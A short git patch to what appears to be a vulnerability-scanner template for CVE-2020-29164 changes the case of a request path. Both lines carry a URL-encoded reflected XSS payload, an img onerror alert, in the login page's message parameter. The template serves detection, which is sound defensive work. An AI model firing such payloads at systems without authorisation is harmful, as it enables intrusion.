From bfddeccb31a1a32a81439c4b7a8b6bc96c6e375e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 11 May 2021 02:42:34 +0530 Subject: [PATCH] path update --- cves/2020/CVE-2020-29164.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-29164.yaml b/cves/2020/CVE-2020-29164.yaml index ad147b8a20..a4b172928d 100644 --- a/cves/2020/CVE-2020-29164.yaml +++ b/cves/2020/CVE-2020-29164.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E" + - "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E" matchers-condition: and matchers: